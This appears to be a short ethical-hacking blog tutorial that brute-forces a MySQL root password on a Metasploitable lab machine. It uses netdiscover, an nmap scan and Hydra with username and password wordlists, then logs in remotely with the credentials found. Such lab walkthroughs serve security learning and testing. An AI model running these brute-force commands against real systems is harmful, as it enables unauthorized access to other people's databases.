Cracking MySQL Password Using Hydra

Today we are going learn how to access the victim machine by cracking the password of MySQL service. 

Disclaimer: The articles provided on HackWithV is purely for informational and educational purpose only, and for those who are willing and curious to know & learn about Ethical Hacking, Security and Penetration Testing. Anytime the word "Hacking" that is used on this site shall be regarded as Ethical Hacking.

What is MySQL?

  • MySQL is an open-source relational database management system.

What is Hydra?

  • Hydra is a parallelized login cracker which supports numerous protocols to attack.
  • New modules are easy to add, beside that, it is flexible and very fast.
  • This tool gives researchers and security consultants the possibility to show how easy it would be to gain unauthorized access from remote to a system.

Practical:

  • Attacker: Kali Linux(OS), Hydra(Tool), Wordlist.
  • Victim: Metasploitable(OS), MySQL(Service).

 sudo netdiscover

  • Here we got the IP (192.168.0.5) of victim. Now lets scan for MySQL service.
 nmap -sV -p 3306 192.168.0.5

  • The nmap says that the victim is running MySQL service. Now its time for cracking the password of MySQL with the help of Hydra tool.
 hydra -help


 hydra -L users.txt -P passwords.txt 192.168.0.5 mysql

  • Here,

        -L is list of usernames

        -P is list of Passwords

  • Here we go, the username is root and password is 12345 .
  • Now lets try to connect to MySQL with these credentials.

mysql -u root -h 192.168.0.5 -p

  • Here we got remote login into victim machine MySQL Database.
 

Be Aware, Be Secure.

Thank You 🙏

Comments

Popular posts from this blog

Demo 1- How to Track Location by a Link

Snyk - Ubuntu 20.04 (Linux)

Cracking VNC Password Using Hydra